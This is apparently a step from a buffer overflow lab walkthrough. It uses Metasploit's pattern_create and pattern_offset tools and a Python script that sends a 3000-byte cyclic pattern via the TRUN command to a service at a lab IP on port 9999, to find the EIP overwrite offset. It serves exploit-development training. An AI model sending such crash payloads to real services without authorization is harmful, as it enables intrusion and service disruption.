Finding the Offset
# Generate a 3000-byte cyclic (non-repeating) pattern with Metasploit's pattern_create.rb;
# -l is the pattern length.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
# where 3000 is the number of bytes at which the software crashed, as observed in Immunity Debugger
# copy the output and paste it into the following script in place of <output>
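#!/usr/bin/python
"""
Send the pattern produced by pattern_create.rb to the target service so the
crash observed in the debugger shows which pattern bytes end up in EIP.

Replace <output> with the generated pattern before running. The host and
port below are the ones used on this page.

Runs under Python 2 and Python 3 (the original used a Python 2-only print
statement). Exits with status 1 if the connection or the send fails.
"""
import sys, socket

TARGET_HOST = '10.10.10.129'
TARGET_PORT = 9999
# Without a timeout a connect/send to an unresponsive target never returns.
TIMEOUT_SECONDS = 5

offset = "<output>"

try:
    s = socket.create_connection((TARGET_HOST, TARGET_PORT), timeout=TIMEOUT_SECONDS)
    try:
        # .encode() gives bytes on Python 3 and a str on Python 2, so the
        # same line works under both interpreters.
        s.send(('TRUN /.:/' + offset).encode())
    finally:
        # Close the socket even when send() raises; the original only
        # closed it on the success path.
        s.close()
except socket.error as exc:
    # Catch only socket failures and report the reason; the original's bare
    # except also swallowed KeyboardInterrupt and hid the actual error.
    print("Error connecting to server: %s" % exc)
    sys.exit(1)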
Then run:
# Look up the value that landed in EIP inside the same pattern; -l must match the
# length given to pattern_create.rb and -q is the value to search for.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337
# where 386F4337 is the value found in EIP when the software crashed